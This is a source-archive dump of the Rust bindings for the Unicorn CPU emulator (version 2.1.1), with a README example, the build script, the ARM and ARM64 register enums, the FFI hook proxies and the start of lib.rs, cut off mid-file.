"copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. <signature of Ty Coon>, 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License.

unicorn-2.1.1/bindings/rust/README.md

# Unicorn-engine

Rust bindings for the [Unicorn](http://www.unicorn-engine.org/) emulator with utility functions.

Check out the Unicorn2 source code at the [dev branch](https://github.com/unicorn-engine/unicorn/tree/dev).
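Each guest architecture is gated behind a Cargo feature (`arch_x86`, `arch_arm`, `arch_riscv`, `arch_mips`, `arch_sparc`, `arch_m68k`, `arch_ppc`, `arch_s390x`, `arch_tricore`; see the `CARGO_FEATURE_ARCH_*` checks in `build.rs`). As a sketch, assuming the crate's default feature set enables every architecture, a build that only needs ARM might be slimmed down like this:

```
[dependencies]
unicorn-engine = { version = "2.1.1", default-features = false, features = ["arch_arm"] }
```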
```rust
use unicorn_engine::{Unicorn, RegisterARM};
use unicorn_engine::unicorn_const::{Arch, Mode, Permission, SECOND_SCALE};

fn main() {
    let arm_code32: Vec<u8> = vec![0x17, 0x00, 0x40, 0xe2]; // sub r0, #23

    let mut unicorn = Unicorn::new(Arch::ARM, Mode::LITTLE_ENDIAN).expect("failed to initialize Unicorn instance");
    let emu = &mut unicorn;
    emu.mem_map(0x1000, 0x4000, Permission::ALL).expect("failed to map code page");
    emu.mem_write(0x1000, &arm_code32).expect("failed to write instructions");

    emu.reg_write(RegisterARM::R0, 123).expect("failed write R0");
    emu.reg_write(RegisterARM::R5, 1337).expect("failed write R5");

    let _ = emu.emu_start(0x1000, (0x1000 + arm_code32.len()) as u64, 10 * SECOND_SCALE, 1000);

    assert_eq!(emu.reg_read(RegisterARM::R0), Ok(100));
    assert_eq!(emu.reg_read(RegisterARM::R5), Ok(1337));
}
```

Further sample code can be found in [tests](../../tests/rust-tests/main.rs).

## Usage

Add this to your `Cargo.toml`:

```
[dependencies]
unicorn-engine = "2.1.1"
```

## Acknowledgements

These bindings are based on Sébastien Duquette's (@ekse) [unicorn-rs](https://github.com/unicorn-rs/unicorn-rs). We picked up the project, as it is no longer maintained. Thanks to all contributors.

unicorn-2.1.1/bindings/rust/build.rs

use pkg_config;
use std::env;
use std::path::PathBuf;
use std::process::Command;

fn ninja_available() -> bool {
    Command::new("ninja").arg("--version").spawn().is_ok()
}

fn msvc_cmake_tools_available() -> bool {
    Command::new("cmake").arg("--version").spawn().is_ok() && ninja_available()
}

fn setup_env_msvc(compiler: &cc::Tool) {
    // If PATH already contains what we need, skip this
    if msvc_cmake_tools_available() {
        return;
    }
    let target = env::var("TARGET").unwrap();
    let devenv = cc::windows_registry::find_tool(target.as_str(), "devenv");
    let tool_root: PathBuf = match devenv {
        Some(devenv_tool) => devenv_tool.path().parent().unwrap().to_path_buf(),
        None => {
            // if devenv (i.e. Visual Studio) was not found, assume compiler is
            // from standalone Build Tools and look there instead.
            // this should be done properly in cc crate, but for now it's not.
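            // Editor's note on the fallback below: with a standalone Build Tools
            // install, cl.exe lives under a path such as (assumed layout)
            //   <prefix>\BuildTools\VC\Tools\MSVC\<version>\bin\Hostx64\x64\cl.exe,
            // so the code checks that a `BuildTools` component is present in the
            // compiler path, rebuilds the prefix up to and including it, and then
            // descends into Common7\IDE, where the CMake and Ninja bundled with
            // Visual Studio installs are expected to live.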
let tools_name = std::ffi::OsStr::new("BuildTools"); let compiler_path = compiler.path().to_path_buf(); compiler_path .iter() .find(|x| *x == tools_name) .expect("Failed to find devenv or Build Tools"); compiler_path .iter() .take_while(|x| *x != tools_name) .collect::<PathBuf>() .join(tools_name) .join(r"Common7\IDE") } }; let cmake_pkg_dir = tool_root.join(r"CommonExtensions\Microsoft\CMake"); let cmake_path = cmake_pkg_dir.join(r"CMake\bin\cmake.exe"); let ninja_path = cmake_pkg_dir.join(r"Ninja\ninja.exe"); if !cmake_path.is_file() { panic!("missing cmake"); } if !ninja_path.is_file() { panic!("missing ninja"); } // append cmake and ninja location to PATH if let Some(path) = env::var_os("PATH") { let mut paths = env::split_paths(&path).collect::<Vec<_>>(); for tool_path in [cmake_path, ninja_path] { paths.push(tool_path.parent().unwrap().to_path_buf()); } let new_path = env::join_paths(paths).unwrap(); env::set_var("PATH", &new_path); } } fn build_with_cmake() { let uc_dir = PathBuf::from(env::var("CARGO_MANIFEST_DIR").unwrap()); let compiler = cc::Build::new().get_compiler(); let has_ninja = if compiler.is_like_msvc() { setup_env_msvc(&compiler); // this is a BIG HACK that should be fixed in unicorn's cmake!! // but for now, tell link.exe to ignore multiply defined symbol names println!("cargo:rustc-link-arg=/FORCE:MULTIPLE"); true } else { ninja_available() }; // cc crate (as of 1.0.73) misdetects clang as gnu on apple if compiler.is_like_gnu() && env::consts::OS != "macos" { // see comment on /FORCE:MULTIPLE println!("cargo:rustc-link-arg=-Wl,-allow-multiple-definition"); } let mut config = cmake::Config::new(&uc_dir); if has_ninja { config.generator("Ninja"); } let mut archs = String::new(); if std::env::var("CARGO_FEATURE_ARCH_X86").is_ok() { archs.push_str("x86;"); } if std::env::var("CARGO_FEATURE_ARCH_ARM").is_ok() { archs.push_str("arm;"); } if std::env::var("CARGO_FEATURE_ARCH_AARCH64").is_ok() { archs.push_str("aarch64;"); } if std::env::var("CARGO_FEATURE_ARCH_RISCV").is_ok() { archs.push_str("riscv;"); } if std::env::var("CARGO_FEATURE_ARCH_MIPS").is_ok() { archs.push_str("mips;"); } if std::env::var("CARGO_FEATURE_ARCH_SPARC").is_ok() { archs.push_str("sparc;"); } if std::env::var("CARGO_FEATURE_ARCH_M68K").is_ok() { archs.push_str("m68k;"); } if std::env::var("CARGO_FEATURE_ARCH_PPC").is_ok() { archs.push_str("ppc;"); } if std::env::var("CARGO_FEATURE_ARCH_S390X").is_ok() { archs.push_str("s390x;"); } if std::env::var("CARGO_FEATURE_ARCH_TRICORE").is_ok() { archs.push_str("tricore;"); } if !archs.is_empty() { archs.pop(); } // need to clear build target and append "build" to the path because // unicorn's CMakeLists.txt doesn't properly support 'install', so we use // the build artifacts from the build directory, which cmake crate sets // to "<out_dir>/build/" let dst = config .define("UNICORN_BUILD_TESTS", "OFF") .define("UNICORN_INSTALL", "OFF") .define("UNICORN_ARCH", archs) .no_build_target(true) .build(); println!( "cargo:rustc-link-search=native={}", dst.join("build").display() ); // Lazymio(@wtdcode): Dynamic link may break. 
See: https://github.com/rust-lang/cargo/issues/5077 if cfg!(feature = "dynamic_linkage") { if compiler.is_like_msvc() { println!("cargo:rustc-link-lib=dylib=unicorn-import"); } else { println!("cargo:rustc-link-lib=dylib=unicorn"); } } else { println!("cargo:rustc-link-lib=static=unicorn"); } if !compiler.is_like_msvc() { println!("cargo:rustc-link-lib=pthread"); println!("cargo:rustc-link-lib=m"); } } fn main() { match pkg_config::Config::new() .atleast_version("2") .cargo_metadata(false) .probe("unicorn") { Ok(lib) => { for dir in lib.link_paths { println!("cargo:rustc-link-search=native={}", dir.to_str().unwrap()); } if cfg!(feature = "dynamic_linkage") { if cc::Build::new().get_compiler().is_like_msvc() { println!("cargo:rustc-link-lib=dylib=unicorn-import"); } else { println!("cargo:rustc-link-lib=dylib=unicorn"); } } else { println!("cargo:rustc-link-arg=-Wl,-allow-multiple-definition"); println!("cargo:rustc-link-lib=static=unicorn"); println!("cargo:rustc-link-lib=pthread"); println!("cargo:rustc-link-lib=m"); } } Err(_) => { build_with_cmake(); } }; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/��������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016565�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/arm.rs��������������������������������������������������������������0000664�0000000�0000000�00000010215�14675241067�0017711�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum RegisterARM { // ARM registers INVALID = 0, APSR = 1, APSR_NZCV = 2, CPSR = 3, FPEXC = 4, FPINST = 5, FPSCR = 6, FPSCR_NZCV = 7, FPSID = 8, ITSTATE = 9, LR = 10, PC = 11, SP = 12, SPSR = 13, D0 = 14, D1 = 15, D2 = 16, D3 = 17, D4 = 18, D5 = 19, D6 = 20, D7 = 21, D8 = 22, D9 = 23, D10 = 24, D11 = 25, D12 = 26, D13 = 27, D14 = 28, D15 = 29, D16 = 30, D17 = 31, D18 = 32, D19 = 33, D20 = 34, D21 = 35, D22 = 36, D23 = 37, D24 = 38, D25 = 39, D26 = 40, D27 = 41, D28 = 42, D29 = 43, D30 = 44, D31 = 45, FPINST2 = 46, MVFR0 = 47, MVFR1 = 48, MVFR2 = 49, Q0 = 50, Q1 = 51, Q2 = 52, Q3 = 53, Q4 = 54, Q5 = 55, Q6 = 56, Q7 = 57, Q8 = 58, Q9 = 59, Q10 = 60, Q11 = 61, Q12 = 62, Q13 = 63, Q14 = 64, Q15 = 65, R0 = 66, R1 = 67, R2 = 68, R3 = 69, R4 = 70, R5 = 71, R6 = 72, R7 = 73, R8 = 74, R9 = 75, R10 = 76, R11 = 77, R12 = 78, S0 = 79, S1 = 80, S2 = 81, S3 = 82, S4 = 83, S5 = 84, S6 = 85, S7 = 86, S8 = 87, S9 = 88, S10 = 89, S11 = 90, S12 = 91, S13 = 92, S14 = 93, S15 = 94, S16 = 95, S17 = 96, S18 = 97, S19 = 98, S20 = 99, S21 = 100, S22 = 101, S23 = 102, S24 = 103, S25 = 104, S26 = 105, S27 = 106, S28 = 107, S29 = 108, S30 = 109, S31 = 110, C1_C0_2 = 111, C13_C0_2 = 112, C13_C0_3 = 113, IPSR = 114, MSP = 115, PSP = 116, CONTROL = 117, IAPSR = 118, EAPSR = 119, XPSR = 120, EPSR = 121, IEPSR = 122, PRIMASK = 123, BASEPRI = 124, BASEPRI_MAX = 125, FAULTMASK = 126, APSR_NZCVQ = 127, APSR_G = 128, APSR_NZCVQG = 129, IAPSR_NZCVQ = 130, IAPSR_G = 131, IAPSR_NZCVQG = 132, EAPSR_NZCVQ = 133, EAPSR_G = 134, EAPSR_NZCVQG = 135, XPSR_NZCVQ = 136, XPSR_G = 137, XPSR_NZCVQG = 138, CP_REG = 139, ENDING = 140, } impl RegisterARM { // alias registers // (assoc) R13 = 12, // (assoc) R14 = 10, // (assoc) R15 = 11, // (assoc) SB = 75, // (assoc) SL = 76, // (assoc) FP = 77, // (assoc) IP = 78, pub const R13: RegisterARM = RegisterARM::SP; pub const R14: RegisterARM = RegisterARM::LR; pub const R15: RegisterARM = RegisterARM::PC; pub const SB: RegisterARM = RegisterARM::R9; pub const SL: RegisterARM = RegisterARM::R10; pub const FP: RegisterARM = RegisterARM::R11; pub const IP: RegisterARM = RegisterARM::R12; } impl From<RegisterARM> for i32 { fn from(r: RegisterARM) -> Self { r as i32 } } #[repr(i32)] #[derive(Debug, PartialEq, Eq, Copy, Clone)] pub enum ArmCpuModel { UC_CPU_ARM_926 = 0, UC_CPU_ARM_946 = 1, UC_CPU_ARM_1026 = 2, UC_CPU_ARM_1136_R2 = 3, UC_CPU_ARM_1136 = 4, UC_CPU_ARM_1176 = 5, UC_CPU_ARM_11MPCORE = 6, UC_CPU_ARM_CORTEX_M0 = 7, UC_CPU_ARM_CORTEX_M3 = 8, UC_CPU_ARM_CORTEX_M4 = 9, UC_CPU_ARM_CORTEX_M7 = 10, UC_CPU_ARM_CORTEX_M33 = 11, UC_CPU_ARM_CORTEX_R5 = 12, UC_CPU_ARM_CORTEX_R5F = 13, UC_CPU_ARM_CORTEX_A7 = 14, UC_CPU_ARM_CORTEX_A8 = 15, UC_CPU_ARM_CORTEX_A9 = 16, UC_CPU_ARM_CORTEX_A15 = 17, UC_CPU_ARM_TI925T = 18, UC_CPU_ARM_SA1100 = 19, UC_CPU_ARM_SA1110 = 20, UC_CPU_ARM_PXA250 = 21, UC_CPU_ARM_PXA255 = 22, UC_CPU_ARM_PXA260 = 23, UC_CPU_ARM_PXA261 = 24, UC_CPU_ARM_PXA262 = 25, UC_CPU_ARM_PXA270 = 26, UC_CPU_ARM_PXA270A0 = 27, UC_CPU_ARM_PXA270A1 = 28, UC_CPU_ARM_PXA270B0 = 29, UC_CPU_ARM_PXA270B1 = 30, UC_CPU_ARM_PXA270C0 = 31, UC_CPU_ARM_PXA270C5 = 32, } impl From<ArmCpuModel> for i32 { fn from(value: ArmCpuModel) -> Self { value as i32 } } impl From<&ArmCpuModel> for i32 { fn from(value: &ArmCpuModel) -> Self { *value as i32 } } 
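// Usage sketch (editor's addition, not part of the generated file): the
// alias constants above make RegisterARM::R13/R14/R15 interchangeable with
// SP/LR/PC, and Unicorn's reg_read/reg_write accept any `T: Into<i32>`:
//
//     let mut emu = Unicorn::new(Arch::ARM, Mode::LITTLE_ENDIAN)?;
//     emu.reg_write(RegisterARM::SP, 0x2000)?;
//     assert_eq!(emu.reg_read(RegisterARM::R13)?, 0x2000); // same register as SP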
�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/arm64.rs������������������������������������������������������������0000664�0000000�0000000�00000012756�14675241067�0020077�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // ARM64 registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum RegisterARM64 { INVALID = 0, X29 = 1, X30 = 2, NZCV = 3, SP = 4, WSP = 5, WZR = 6, XZR = 7, B0 = 8, B1 = 9, B2 = 10, B3 = 11, B4 = 12, B5 = 13, B6 = 14, B7 = 15, B8 = 16, B9 = 17, B10 = 18, B11 = 19, B12 = 20, B13 = 21, B14 = 22, B15 = 23, B16 = 24, B17 = 25, B18 = 26, B19 = 27, B20 = 28, B21 = 29, B22 = 30, B23 = 31, B24 = 32, B25 = 33, B26 = 34, B27 = 35, B28 = 36, B29 = 37, B30 = 38, B31 = 39, D0 = 40, D1 = 41, D2 = 42, D3 = 43, D4 = 44, D5 = 45, D6 = 46, D7 = 47, D8 = 48, D9 = 49, D10 = 50, D11 = 51, D12 = 52, D13 = 53, D14 = 54, D15 = 55, D16 = 56, D17 = 57, D18 = 58, D19 = 59, D20 = 60, D21 = 61, D22 = 62, D23 = 63, D24 = 64, D25 = 65, D26 = 66, D27 = 67, D28 = 68, D29 = 69, D30 = 70, D31 = 71, H0 = 72, H1 = 73, H2 = 74, H3 = 75, H4 = 76, H5 = 77, H6 = 78, H7 = 79, H8 = 80, H9 = 81, H10 = 82, H11 = 83, H12 = 84, H13 = 85, H14 = 86, H15 = 87, H16 = 88, H17 = 89, H18 = 90, H19 = 91, H20 = 92, H21 = 93, H22 = 94, H23 = 95, H24 = 96, H25 = 97, H26 = 98, H27 = 99, H28 = 100, H29 = 101, H30 = 102, H31 = 103, Q0 = 104, Q1 = 105, Q2 = 106, Q3 = 107, Q4 = 108, Q5 = 109, Q6 = 110, Q7 = 111, Q8 = 112, Q9 = 113, Q10 = 114, Q11 = 115, Q12 = 116, Q13 = 117, Q14 = 118, Q15 = 119, Q16 = 120, Q17 = 121, Q18 = 122, Q19 = 123, Q20 = 124, Q21 = 125, Q22 = 126, Q23 = 127, Q24 = 128, Q25 = 129, Q26 = 130, Q27 = 131, Q28 = 132, Q29 = 133, Q30 = 134, Q31 = 135, S0 = 136, S1 = 137, S2 = 138, S3 = 139, S4 = 140, S5 = 141, S6 = 142, S7 = 143, S8 = 144, S9 = 145, S10 = 146, S11 = 147, S12 = 148, S13 = 149, S14 = 150, S15 = 151, S16 = 152, S17 = 153, S18 = 154, S19 = 155, S20 = 156, S21 = 157, S22 = 158, S23 = 159, S24 = 160, S25 = 161, S26 = 162, S27 = 163, S28 = 164, S29 = 165, S30 = 166, S31 = 167, W0 = 168, W1 = 169, W2 = 170, W3 = 171, W4 = 172, W5 = 173, W6 = 174, W7 = 175, W8 = 176, W9 = 177, W10 = 178, W11 = 179, W12 = 180, W13 = 181, W14 = 182, W15 = 183, W16 = 184, W17 = 185, W18 = 186, W19 = 187, W20 = 188, W21 = 189, W22 = 190, W23 = 191, W24 = 192, W25 = 193, W26 = 194, W27 = 195, W28 = 196, W29 = 197, W30 = 198, X0 = 199, X1 = 200, X2 = 201, X3 = 202, X4 = 203, X5 = 204, X6 = 205, X7 = 206, X8 = 207, X9 = 208, X10 = 209, X11 = 210, X12 = 211, X13 = 212, X14 = 213, X15 = 214, X16 = 215, X17 = 216, X18 = 217, X19 = 218, X20 = 219, X21 = 220, X22 = 221, X23 = 222, X24 = 223, X25 = 224, X26 = 225, X27 = 226, X28 = 227, V0 = 228, V1 = 229, V2 = 230, V3 = 231, V4 = 232, V5 = 233, V6 = 234, V7 = 235, V8 = 236, V9 = 237, V10 = 238, V11 = 239, V12 = 240, V13 = 241, V14 = 242, V15 = 243, V16 = 244, V17 = 245, V18 = 246, V19 = 247, 
V20 = 248, V21 = 249, V22 = 250, V23 = 251, V24 = 252, V25 = 253, V26 = 254, V27 = 255, V28 = 256, V29 = 257, V30 = 258, V31 = 259, // pseudo registers PC = 260, CPACR_EL1 = 261, // thread registers, deprecated, use CP_REG instead TPIDR_EL0 = 262, TPIDRRO_EL0 = 263, TPIDR_EL1 = 264, PSTATE = 265, // exception link registers, deprecated, use CP_REG instead ELR_EL0 = 266, ELR_EL1 = 267, ELR_EL2 = 268, ELR_EL3 = 269, // stack pointer registers, deprecated, use CP_REG instead SP_EL0 = 270, SP_EL1 = 271, SP_EL2 = 272, SP_EL3 = 273, // other CP15 registers, deprecated, use CP_REG instead TTBR0_EL1 = 274, TTBR1_EL1 = 275, ESR_EL0 = 276, ESR_EL1 = 277, ESR_EL2 = 278, ESR_EL3 = 279, FAR_EL0 = 280, FAR_EL1 = 281, FAR_EL2 = 282, FAR_EL3 = 283, PAR_EL1 = 284, MAIR_EL1 = 285, VBAR_EL0 = 286, VBAR_EL1 = 287, VBAR_EL2 = 288, VBAR_EL3 = 289, CP_REG = 290, ENDING = 291, } impl RegisterARM64 { // alias registers // (assoc) IP0 = 215, // (assoc) IP1 = 216, // (assoc) FP = 1, // (assoc) LR = 2, pub const IP0: RegisterARM64 = RegisterARM64::X16; pub const IP1: RegisterARM64 = RegisterARM64::X17; pub const FP: RegisterARM64 = RegisterARM64::X29; pub const LR: RegisterARM64 = RegisterARM64::X30; } impl From<RegisterARM64> for i32 { fn from(r: RegisterARM64) -> Self { r as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum Arm64CpuModel { UC_CPU_ARM64_A57 = 0, UC_CPU_ARM64_A53 = 1, UC_CPU_ARM64_A72 = 2, UC_CPU_ARM64_MAX = 3, } impl From<Arm64CpuModel> for i32 { fn from(value: Arm64CpuModel) -> Self { value as i32 } } impl From<&Arm64CpuModel> for i32 { fn from(value: &Arm64CpuModel) -> Self { (*value) as i32 } }

unicorn-2.1.1/bindings/rust/src/ffi.rs

#![allow(non_camel_case_types)]
#![allow(dead_code)]

use crate::{Unicorn, UnicornInner};

use super::unicorn_const::{uc_error, Arch, HookType, MemRegion, MemType, Mode, Query, TlbEntry};

use alloc::rc::Weak;
use core::cell::UnsafeCell;
use core::ffi::c_void;
use libc::{c_char, c_int};

pub type uc_handle = *mut c_void;
// TODO: Use c_size_t as soon as it is stable.
The c api exposes uc_hook as size_t pub type uc_hook = *mut c_void; pub type uc_context = *mut c_void; extern "C" { pub fn uc_version(major: *mut u32, minor: *mut u32) -> u32; pub fn uc_arch_supported(arch: Arch) -> bool; pub fn uc_open(arch: Arch, mode: Mode, engine: *mut uc_handle) -> uc_error; pub fn uc_close(engine: uc_handle) -> uc_error; pub fn uc_context_free(mem: uc_context) -> uc_error; pub fn uc_errno(engine: uc_handle) -> uc_error; pub fn uc_strerror(error_code: uc_error) -> *const c_char; pub fn uc_reg_write(engine: uc_handle, regid: c_int, value: *const c_void) -> uc_error; pub fn uc_reg_read(engine: uc_handle, regid: c_int, value: *mut c_void) -> uc_error; pub fn uc_mem_write( engine: uc_handle, address: u64, bytes: *const u8, size: libc::size_t, ) -> uc_error; pub fn uc_mem_read( engine: uc_handle, address: u64, bytes: *mut u8, size: libc::size_t, ) -> uc_error; pub fn uc_mem_map(engine: uc_handle, address: u64, size: libc::size_t, perms: u32) -> uc_error; pub fn uc_mem_map_ptr( engine: uc_handle, address: u64, size: libc::size_t, perms: u32, ptr: *mut c_void, ) -> uc_error; pub fn uc_mmio_map( engine: uc_handle, address: u64, size: libc::size_t, read_cb: *mut c_void, user_data_read: *mut c_void, write_cb: *mut c_void, user_data_write: *mut c_void, ) -> uc_error; pub fn uc_mem_unmap(engine: uc_handle, address: u64, size: libc::size_t) -> uc_error; pub fn uc_mem_protect( engine: uc_handle, address: u64, size: libc::size_t, perms: u32, ) -> uc_error; pub fn uc_mem_regions( engine: uc_handle, regions: *const *const MemRegion, count: *mut u32, ) -> uc_error; pub fn uc_emu_start( engine: uc_handle, begin: u64, until: u64, timeout: u64, count: libc::size_t, ) -> uc_error; pub fn uc_emu_stop(engine: uc_handle) -> uc_error; pub fn uc_hook_add( engine: uc_handle, hook: *mut uc_hook, hook_type: HookType, callback: *mut c_void, user_data: *mut c_void, begin: u64, end: u64, ... ) -> uc_error; pub fn uc_hook_del(engine: uc_handle, hook: uc_hook) -> uc_error; pub fn uc_query(engine: uc_handle, query_type: Query, result: *mut libc::size_t) -> uc_error; pub fn uc_context_alloc(engine: uc_handle, context: *mut uc_context) -> uc_error; pub fn uc_context_save(engine: uc_handle, context: uc_context) -> uc_error; pub fn uc_context_restore(engine: uc_handle, context: uc_context) -> uc_error; pub fn uc_ctl(engine: uc_handle, control: u32, ...) 
-> uc_error; } pub struct UcHook<'a, D: 'a, F: 'a> { pub callback: F, pub uc: Weak<UnsafeCell<UnicornInner<'a, D>>>, } pub trait IsUcHook<'a> {} impl<'a, D, F> IsUcHook<'a> for UcHook<'a, D, F> {} pub unsafe extern "C" fn mmio_read_callback_proxy<D, F>( uc: uc_handle, offset: u64, size: usize, user_data: *mut UcHook<D, F>, ) -> u64 where F: FnMut(&mut crate::Unicorn<D>, u64, usize) -> u64, { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc, offset, size) } pub unsafe extern "C" fn mmio_write_callback_proxy<D, F>( uc: uc_handle, offset: u64, size: usize, value: u64, user_data: *mut UcHook<D, F>, ) where F: FnMut(&mut crate::Unicorn<D>, u64, usize, u64), { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc, offset, size, value); } pub unsafe extern "C" fn code_hook_proxy<D, F>( uc: uc_handle, address: u64, size: u32, user_data: *mut UcHook<D, F>, ) where F: FnMut(&mut crate::Unicorn<D>, u64, u32), { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc, address, size); } pub unsafe extern "C" fn block_hook_proxy<D, F>( uc: uc_handle, address: u64, size: u32, user_data: *mut UcHook<D, F>, ) where F: FnMut(&mut crate::Unicorn<D>, u64, u32), { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc, address, size); } pub unsafe extern "C" fn mem_hook_proxy<D, F>( uc: uc_handle, mem_type: MemType, address: u64, size: u32, value: i64, user_data: *mut UcHook<D, F>, ) -> bool where F: FnMut(&mut crate::Unicorn<D>, MemType, u64, usize, i64) -> bool, { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc, mem_type, address, size as usize, value) } pub unsafe extern "C" fn intr_hook_proxy<D, F>( uc: uc_handle, value: u32, user_data: *mut UcHook<D, F>, ) where F: FnMut(&mut crate::Unicorn<D>, u32), { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc, value); } pub unsafe extern "C" fn insn_in_hook_proxy<D, F>( uc: uc_handle, port: u32, size: usize, user_data: *mut UcHook<D, F>, ) -> u32 where F: FnMut(&mut crate::Unicorn<D>, u32, usize) -> u32, { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc, port, size) } pub unsafe extern "C" fn insn_invalid_hook_proxy<D, F>( uc: uc_handle, user_data: *mut UcHook<D, F>, ) -> bool where F: FnMut(&mut crate::Unicorn<D>) -> bool, { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc) } pub unsafe extern "C" fn insn_out_hook_proxy<D, F>( uc: uc_handle, port: u32, size: usize, value: u32, user_data: *mut UcHook<D, F>, ) where F: 
FnMut(&mut crate::Unicorn<D>, u32, usize, u32), { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc, port, size, value); } pub unsafe extern "C" fn insn_sys_hook_proxy<D, F>(uc: uc_handle, user_data: *mut UcHook<D, F>) where F: FnMut(&mut crate::Unicorn<D>), { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); (user_data.callback)(&mut user_data_uc); } pub unsafe extern "C" fn tlb_lookup_hook_proxy<D, F>( uc: uc_handle, vaddr: u64, mem_type: MemType, result: *mut TlbEntry, user_data: *mut UcHook<D, F>, ) -> bool where F: FnMut(&mut crate::Unicorn<D>, u64, MemType) -> Option<TlbEntry>, { let user_data = &mut *user_data; let mut user_data_uc = Unicorn { inner: user_data.uc.upgrade().unwrap(), }; debug_assert_eq!(uc, user_data_uc.get_handle()); let r = (user_data.callback)(&mut user_data_uc, vaddr, mem_type); if let Some(ref e) = r { let ref_result: &mut TlbEntry = &mut *result; *ref_result = *e; }; r.is_some() } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/lib.rs��������������������������������������������������������������0000664�0000000�0000000�00000115530�14675241067�0017706�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������//! Bindings for the Unicorn emulator. //! //! //! //! # Example use //! //! ```rust //! //! use unicorn_engine::RegisterARM; //! use unicorn_engine::unicorn_const::{Arch, Mode, Permission, SECOND_SCALE}; //! //! fn emulate() { //! let arm_code32 = [0x17, 0x00, 0x40, 0xe2]; // sub r0, #23 //! //! let mut emu = unicorn_engine::Unicorn::new(Arch::ARM, Mode::LITTLE_ENDIAN).expect("failed to initialize Unicorn instance"); //! emu.mem_map(0x1000, 0x4000, Permission::ALL).expect("failed to map code page"); //! emu.mem_write(0x1000, &arm_code32).expect("failed to write instructions"); //! //! emu.reg_write(RegisterARM::R0, 123).expect("failed write R0"); //! emu.reg_write(RegisterARM::R5, 1337).expect("failed write R5"); //! //! emu.emu_start(0x1000, (0x1000 + arm_code32.len()) as u64, 10 * SECOND_SCALE, 1000).unwrap(); //! assert_eq!(emu.reg_read(RegisterARM::R0), Ok(100)); //! assert_eq!(emu.reg_read(RegisterARM::R5), Ok(1337)); //! } //! ``` //! 
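//! Every fallible call returns `Result<_, uc_error>`. A hedged sketch of
//! typical error handling (passing 0 for the timeout and instruction count
//! means "no limit", as in the underlying C API):
//!
//! ```rust,ignore
//! match emu.emu_start(0x1000, 0x2000, 0, 0) {
//!     Ok(()) => { /* emulation reached the end address */ }
//!     Err(err) => panic!("emulation stopped early: {:?}", err),
//! }
//! ```
//!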
#![no_std] #[macro_use] extern crate alloc; extern crate std; use alloc::boxed::Box; use alloc::rc::Rc; use alloc::vec::Vec; use core::cell::UnsafeCell; use core::ptr; use libc::c_void; use ffi::uc_handle; #[macro_use] pub mod unicorn_const; pub use unicorn_const::*; pub mod ffi; // lets consumers call ffi if desired // include arm support if conditionally compiled in #[cfg(feature = "arch_arm")] mod arm; #[cfg(feature = "arch_arm")] pub use crate::arm::*; // include arm64 support if conditionally compiled in // NOTE: unicorn-c only separates on top-level arch name, // not on the bit-length, so we include both #[cfg(feature = "arch_arm")] mod arm64; #[cfg(feature = "arch_arm")] pub use crate::arm64::*; // include m68k support if conditionally compiled in #[cfg(feature = "arch_m68k")] mod m68k; #[cfg(feature = "arch_m68k")] pub use crate::m68k::*; // include mips support if conditionally compiled in #[cfg(feature = "arch_mips")] mod mips; #[cfg(feature = "arch_mips")] pub use 